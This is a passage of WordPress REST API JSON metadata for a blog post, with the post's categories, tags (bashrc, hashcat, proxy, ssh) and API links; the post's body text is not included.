[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,8],"tags":[11,36,66,85],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-wen","category-suibi","tag-bashrc","tag-hashcat","tag-proxy","tag-ssh"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=192"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/192\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}